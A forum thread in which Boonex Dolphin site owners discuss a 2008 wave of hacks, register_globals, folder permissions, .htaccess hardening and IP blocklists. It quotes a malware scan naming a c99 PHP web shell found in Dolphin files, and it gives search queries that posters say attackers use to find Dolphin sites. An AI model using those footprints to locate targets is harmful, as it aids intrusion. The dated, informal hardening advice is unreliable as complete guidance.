i think what should have been done is that yes dolphin should warn against being on a server with register_globals on, but this is also something that the host should warn about that are turning moreso than the developer should warn about turning off, since after php4.2 they were off by default, so they are intentionally turned on. so when you develop a script according to standards of other software releases, you would presume that other services involved such as hosting providers, would follow those guidelines or have it written in their agreement or TOS that they have opted against industry standards, and outline what measures should be taken to maintain a safe hosting environment.

later,
DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
13 Jul 2008

Hi,

Texaseagle - so far I havent been hacked (fingers crossed) and I am on a host with Registe_Globals Off. They are - Hostmonster.

Many people on this forum have recommended good hosts in the past. Search for Host and you'll see many posts.

To be honest I have always toyed between using Dolphin/Orca and PhpBB. Dolphin wins out because the Paypal subscription thing is built in. Currently in PhpBB3 there is no subscription mod.

BUT where phpbb does win is in their support set-up in particular their comprehensive list of recommended hosts - http://www.phpbb.com/hosting/

I's like to see Boonex set up a list of recommended hosts rather than just pushing Host For Web who many people have had problems with (myself included).

Cheers

Max

14 Jul 2008

avhow, this basically reminds me of locking all your doors but leaving your windows wide open. DUH, if the burglar comes, he is going to get in. and remember, a lock dont stop a theif, only keeps an honest man honest. so no matter what boonex or any other developer does for security, there is always going to be something that is going to be tried by these people who have nothing better to do with their time.

later,

DosDawg

I think your analogy seems a bit simplistic really.  Where for example in your analogy is the issue of whether window manufacturers could improve their quality control, and build in better mechanisms (which are already available to them) so that the windows can't be opened from the outside, whether they are locked or not - thereby protecting their customers from any issue of forgetting to lock a window?  But yes, of course, it would be easier in the long run to ignore the existence of such a mechanism, and instead simply tell people they should lock their windows, and if you forget, bad luck.

I do hate to quote myself, but, as I mentioned, php.net seem to think there is nothing wrong with RG if the scripting is done securely:

http://www.php.net/register_globals

... and I quote from that page, paragraph 1 "... keep in mind that the directive itself isn't insecure but rather it's the misuse of it."

Now if I am missing something here - and there really is something in the Dolphin code that can not possibly be done another way, making it safe with RG on, please feel free to explain it, as technically as necessary.  I assure you I will appreciate it.

14 Jul 2008

I noticed a couple things:

1st.  Someone mentioned that the database login and password are written in the header.inc.php

I checked and that is true.  Matter of fact I found that most folders do not have index files and anyone can url to a folder and see the contents.  You could even download the header.inc file and view the source code.

2nd my host recommends changing folders to 660 permission

3rd  Having the correct htaccess file would be of help.  No htaccess file came with the dolphin download

4th most attacks seem to be entering through the ray modules global inc folder

5th  hackers may be pulling url addresse for dolphin owners from unity

6th I found a list of hacker ips on the net.  I blocked the majority of them especially from asia

http://www.dvdriot.com/secure/index.html

14 Jul 2008

Is it still a problem, also with 6.1? :/

14 Jul 2008

You can find a good blocklist from this site:
http://www.wizcrafts.net

On the left column find Htaccess Blocklists. Then you will have the option of chinese, exploited servers, nigherian, and russian.
http://www.wizcrafts.net/chinese-blocklist.html
http://www.wizcrafts.net/exploited-servers-blocklist.html
http://www.wizcrafts.net/nigerian-blocklist.html
http://www.wizcrafts.net/russian-blocklist.html

I don't make them or know for certain what makes this sites list. They are all updated regularly.

By adding them all you will most likely block a few that are not causing issues. So this is not a perfect sollution either. Also make sure you sever's ip don't fall in any of the ranges or you'll block yourself or site.

For example you can block a whole range 1.0.0.0-1.255.255.255 by
deny from 1.0.0.0/8 but that is going to block a whole ton of ip's.

It's not going to make your problem disappear, but it is a good site/list to follow. I think you could block ip's all day long in this case, they just keep changing. So it will temporarily block someone, but I don't think it does a whole lot of good. The minute you block one, it just changes.

If you have index browsing on then yes they can browse your files and folders. Even if someone happened to download your header it will most likely be blank. Try it. Many scripts have the database connection in there somewhere whether it be a header file or config file or similar. Even if you had Options -Indexes in your .htaccess I could still create a hyperlink to yoursite.com/location of header which we all know and download it, but what I will get is a blank document/file.

I wouldn't be surprised if they are pulling addresses from here, google, yahoo, or anywhere else they might be published. I have non-dolphin sites that are taking a ton of hits from this that are all over google and other search engines.

All I can say is hang in there, keep an eye on files and folders as much as possible. Keep your site and database backed up regularly.

Safehtml is used by plenty of other scripts besides dolphin. I am wondering if anyone running another script that uses this if you are seeing a bunch of hits on your other script as well? Or if dolphin sites seem to be the big target.

Same with other forums and message boards at other sites that use this. Are they seeing anything similar.

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
14 Jul 2008

ken707,

 

The hacks are indeed half the time coming through ray, but Safehtml is another source of the hacks, I do not know enough about code to tell how but it seems that currently it is doing the opposite of what it was designed for.  Anywho, I got fed up with my shared server, and its crew of finger pointers at IX webhosting.  I am swithing over to DosDawgs hosting as he has been the only source of help I received.

 

 

Thanks,

Roy

14 Jul 2008

If memory servers me correct ... (I'm old) ... but Joomla experienced this Global on, Global off issue a while back and implemented a globals.php file that emulates the globals off for all joomla ... this for the most part corrected this issue. 

 

My dolphin test site was hacked and my paid account is still locked by my host provider ... I agree having total control over your own server helps stop the attacks.  I went with a host provider, my mistake ... Boonex/Dolphin needs to improve their security before implementing any new changes.... just my thought?

 

I was migrating from joomla to dolphin because of the appearance organized ease  ... not my KNOW HOW! In programming.  

 

Boonex offers a great package with a sense of real quality.  I’m new to dolphin but I see a: soon to be really great CMS going threw some really nasty growing pains.

 

Good luck …… I still think it’s worth waiting for the next security patch…

 

14 Jul 2008

http://www.php.net/register_globals

... and I quote from that page, paragraph 1 "... keep in mind that the directive itself isn't insecure but rather it's the misuse of it."

Now if I am missing something here - and there really is something in the Dolphin code that can not possibly be done another way, making it safe with RG on, please feel free to explain it, as technically as necessary.  I assure you I will appreciate it.

you quote that from php.net but you didnt quote the warning above nor the whole 2 paragraphs

Warning

This feature has been DEPRECATED and REMOVED as of PHP 6.0.0. Relying on this feature is highly discouraged.

Highly Discouraged is telling you something is it not? php.net are in effect telling all shared hosting companies not to turn register globals on

you also quoted the last line of paragraph 1

but keep in mind that the directive itself isn't insecure but rather it's the misuse of it.

this is a bit like saying, the door is locked but we left an Axe around if you look.

But look at the 1st line of the 2nd paragraph and here is what you fail to see.

When on, register_globals will inject your scripts with all sorts of variables

this means you have provided the tools on the server for the hackers to use to inject your sites with their code

if it is that secure, why the need to drop register globals all together in php 6?

the misuse of it is by shared hosting providers. they turn it on when its been installed with the default setting of OFF

It seems you are missing my point completely.  I am not advocating that register_globals should not be turned off.

The point is, why would developers not allow for the fact that not everybody understands things like RG or htaccess files, or has their own dedicated server (and knows how to configure it) and so on.

Register Globals in itself is not insecure.  It becomes insecure when - and only when - there is insecure code.  Hackers can't do anything with RG alone - they need to find a script that has been insecurely written, and then they can use RG if it is on, to exploit that script.  Only the developers can solve the problem properly - by closing the holes in the script.

To put it another way - imagine you write a script and someone informs you that there is a security flaw in it which makes it vulnerable on servers where Register_Globals is enabled.  Which is the better course of action:

1.) Fix the problem, so it is safe even on servers with RG enabled.

2.) Adopt a position of I don't care, if people are stupid enough to have RG on, they deserve to be hacked.

I hope that explains the issue better.

There is also a major issue here that is being somewhat forgotten I fear in the drama over RG.  That is the folders with 777 permissions, by default after a fresh installation of the script.  This is necessary in a script that has things such as user upload of files involved.  But, while there has been discussion in this thread about how one can protect those folders with correct htaccess settings, Dolphin does not include those htaccess settings in the installation.  Why not? Surely that is a simple thign to do.  If there's a legitimate reason, why not let us know.

Also, I do want to say, because I'm sure plenty of people will be assuming otherwise, that I am not here to attack Boonex and cause trouble.  I really like the Dolphin Suite of products, and want to involve myself in them for a long time to come (if I didn't I would have just moved on rather than bothering with this bashing of my head against what increasingly appears to be a brick wall).  I am simply suggesting improvements by allowing for contingencies, such as users who do not know what a global variable is, or an .htaccess file, let alone how to install or configure mod_security for example.

And, I guess, to be honest, bandaid 'solutions' are a pet peeve of mine, and thats how I see the common misconception that Register_Globals is the root of all evil and simply turning it off is the cureall wonderdrug to fix the problem.  It isn't.  The real solution is to solve problems In The Code.

14 Jul 2008

This is the message I received from a Linux System Administrator in Hostgator this morning :

 

"You will not be able to use php_flag in .htaccess on our servers as we use suPHP. You instead need to use a php.ini file in your home directory. Would you like me to create one based on the server's configuration for you in your home directory?"

 

At the same time I was also informed that viruses had been introduced into my ray folders in two different domains hosted with Hostgator. This is another new kind of attack, I think :

 

"/home/mokhsein/public_html/ecovoiceonline/ray/modules/global/inc/errors.php: HG-PHP.errors.php.MD5.AA FOUND

/home/mokhsein/public_html/shashamedia/ray/modules/global/inc/functions.php: HG-PHPSHELL.c99.Fragment.AB FOUND

 

----------- SCAN SUMMARY -----------

Known viruses: 380695

Engine version: devel-20080603

Scanned directories: 14221

Scanned files: 35309

Infected files: 2

Data scanned: 751.20 MB

Time: 226.821 sec (3 m 46 s)"

 





14 Jul 2008

They have been going at it all day. I have tried a few things but it only serves as a temporary break in their attack. This attack is definately focused on Dolphin as I have other sites on the server(s) that are not effected at all. I do believe RG-on or off is a personal Server Administrative preference as of Apache2.0 but don't recommend it if your not comfortable with direct server management.

 

My sites are not affected D6.1.2. Although they are continually rerouting the same lame attack at the site(s) but continually fail.

 

Proven Hosting -- Well that's a matter of who,what,how. All hosting business models partner with Farms or Resellers of Farms (13 major world-wide or better know as the NET) Over the last 5 years a handful of MicroFarms have popped up on the NET (GoDaddy) being the largest one but a mere spec in comparison to The Planet server power (At least in North America).

 

When developing Reseller Hosting which is what all hosters within BoonEx including myself are doing... we are limitted to our own knowledge of Server Administration and Configuration. If we need help we have 2 choices. Solve the problem yourself or pay an excessive amount of money for Farm Engineer/Software help which most of us Open Source Freaks will never pay the MAN for help. We'll just figure it out!!! What types of fee's you ask $150.00 to $250.00 per hour with a 3-5 hour min. And all of you want $1.99 hosting...

 

If your running Apache2.0 server your help/support(FREE) window has decreased greatly as most ServerFarms are running Apache1.3.3. As of Dec 07 Apache and PHP stopped supporting their old verions and forced Farms and Hosters to begin the transition into Apache2.0 and PHP5. Over the past 12 months several people within the BoonEx community have adopted Apache2.0 Web Server and have farless issues with Dolphin. However, being wise to all that is Server Administration buiding to fast could have awful consequences down the road. The Community Wide Hack is an example of this.

 

I too, jumped out quick just to find some Hardware as well as "Hosting Support" issues rising up...A little bad luck and bam I was down but not out. This time I return better understanding the Apache,PHP, and cPanel way which is more important to Hosting then Dolphin. BUT DOLPHIN as a showcase to this new advance web servering platform is a BIG SHINEY DIAMOND of scripting fun and will replace CMS...shortly. I also like to mirror the Boonex.us community platform :)

 

I have followed The Planet as a baramoter to how the NA industry is moving along. Over the past 8 months I have seen a drastic reduce is Hardware cost as well as more "general support" wanting to help on my Web2.0 server were 8 months ago it was an immediate no and that will cost....

 

So no matter who you choose to host your Dolphin Community asking some questions and being better informed to the actual process of hosting might help some of you in here find your way. Paying a little more might also be wise. Bottomline managing a Dolphin Community is not Server Management. So if your not comfortable with Server Side processes please find a Host or Administrator who is comfortable with it so you can focus more on the Community Management. If your SERVER (Dedicated/VPS/or Shared) is configured properly Dolphin works wonderfully, enough so I recommend it for Commercial deployment all the time. However I inform the Business or Individual as to the importance of Server Administration with this Dolphin software. Most scoff at the cost but they also think Ebay/MySpace/FaceBook are running on a single server maybe a few...lol

 

Is this helpful for some or not? Vote :)

 

 

14 Jul 2008

http://www.boonex.com/unity/blog/entry/IMPORTANT_Security_Alert_

14 Jul 2008

http://www.boonex.com/unity/blog/entry/IMPORTANT_Security_Alert_

Great news - thanks.

14 Jul 2008

There was an earlier post by DosDawg that suggested the setting php_flag register_globals 0

Please address the difference between php_flag register_globals 0 and php_flag register_globals off.

All other posts have referred to "php_flag register_globals off". This includes the post from Dolphin.

Which is the proper code for security protection on Dolphin?

Thank you.

Arthur

15 Jul 2008

Thanks Sammie. Upon checking, I find that register_globals is turned off on my servers. You are correct, they are dedicated. The entries in .htaccess are therefore redundant.

This may be useful info for some.

; - register_globals = Off [Security, Performance] ; Global variables are no longer registered for input data (POST, GET, cookies, ; environment and other server variables). Instead of using $foo, you must use ; you can use $_REQUEST["foo"] (includes any variable that arrives through the ; request, namely, POST, GET and cookie variables), or use one of the specific ; $_GET["foo"], $_POST["foo"], $_COOKIE["foo"] or $_FILES["foo"], depending ; on where the input originates. Also, you can look at the ; import_request_variables() function. ; Note that register_globals is going to be depracated (i.e., turned off by ; default) in the next version of PHP, because it often leads to security bugs. ; Read http://php.net/manual/en/security.registerglobals.php for further ; information.

15 Jul 2008

>> 5th  hackers may be pulling url addresse for dolphin owners from unity


Naaaa … hackers wouldn't waste the time when they have a laser-targeted list with a simple search engine search:

"BoonEx - Community Software; Dating And Social Networking Scripts; Video Chat And More"


Results 1 - 10 of about 179,000 for "BoonEx - Community Software; Dating And Social Networking Scripts; Video Chat And More". (0.46 seconds)

http://www.google.com/search?complete=1&hl=en&q=%22BoonEx+-+Community+Software%3B+Dating+And+Social+Networking+Scripts%3B+Video+Chat+And+More%22&btnG=Google+Search&aq=f

16 Jul 2008

Hi,

Ken707 - If you want to stop someone from seeing whats in a folder when they navigate to it directly you can insert a index.html file thats a simple redirect to your home page. Or do one that warns them. I sometimes use this - it also displays their ip address. Dont know how effective it is but it stops them viewing your files...

<div style="text-align: center;"><br>
<br>
<span style="font-family: Arial Black;"><span style="font-weight: bold;"><br>
This area is restricted.<br>
Your IP address has been logged and your unauthorised <br>
access attempt will be reported.<br>
IP :
<?php
echo $_SERVER['REMOTE_ADDR'];
?>
<br>
<br>
</span></span></div>

Just create a text file, copy it in then save it as index.html and upload it into your folders.

I think theres probably a more efficient way to do it using htaccess or something but I'm not a programmer (I'm a template tweaker) so I'm not sure how to write that.

Cheers

Max

16 Jul 2008

What you are referring to is adding the followng line

Options -indexes

to the root .htaccess file which prevents directory browsing even

if you don't have an index file in directories.


i.e. no one can see your files …


It will return: 

Forbidden

You don't have permission to access /whatever/ on this server.


Thanks for sharing …

17 Jul 2008

Hi,

So I just insert the line -

Options -indexes

To anywhere inside my root htaccess?


Its that simple?

Cheers

Max

18 Jul 2008

Yes your root .htaccess file (for dolphin) should already have the line
Options -MultiViews
at the top.


Just put it on the next line.  This makes ALL directories under the root
NOT show files.


Test by going to a directory that does NOT have an index file or simply

make a new directory to test with.


By contrast if you want to enable directory listings for certain directories
on your server, just create a .htaccess file in those directories and place in it the line:
Options +indexes

19 Jul 2008

Hi all,

 

this may or may not help some.

 

firstly I think Dolphin is great - but the first time I used it I installed without checking over the issues etc so I got hacked and my account was suspended. this time i read up and may have got it better :)

 

The biggest difficulty I found was with getting register_globals to off. I finally got my hosting company to turn the globals off at teir end and they put me on a php.ini file. When I ran my own info.php file on my php server set up it said my globals was turned off - so I thought it was dealt with. However when I checked the php set up with the admin/phpinfo.php method included with dolpin it said the global_registers were still on.

 

so I tried loadds of ways to gt it to register off - changing php.ini and adapting .htaccess code. finally got it sorted by using this code in the main .htaccess file in root directory:

 

suPHP_ConfigPath /home/YourcPanelName/public_html

 

If you are using a cpanel enviroment with suPHP installed this is the way to get your php.ini file recognised sitewide. If you think you have your globals switchd off but still get hacked always check using the dolphin admin/phpinfo.php method to make sure - don't just rely on an info.php script in your root folder.

 

Having said this I've probably oopened my self up to attack now Cry

 

all the best

Kevin

18 Mar 2009

Hi My site just got hacked I restored it and 5 hours later it was hacked again.

Could I please get some recommendations of a freelancer that could Audit and harden my server and Dolphin set up?

Need this ASAP

J

15 Aug 2009

Many Hackers find your site with the help of google, and sometimes yahoo. If you don't want to be a target, get all the default language changed to something custom.

Pay for a liscense to remove the "Powered by Dolphin" mention in the footer.

http://www.google.com/search?hl=en&safe=off&num=100&q=%22powered+by+dolphin+smart+community+builder%22&aq=f&oq=&aqi=

Do not use the default "quotes" that come with the quotes mod.

Don't use any default signup lingo, or anything that is default.

It can all be found in a google searc. Once a hacker finds your dolphin site, it's just a matter of testing it for vulnourabilities after that. Once they see that you have an open door, then you will be hacked. But trust me, it starts with a search.

And oh yeah, never post your link here. Hackers lurk around here for their next victim as well.

15 Aug 2009
31 Aug 2015
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.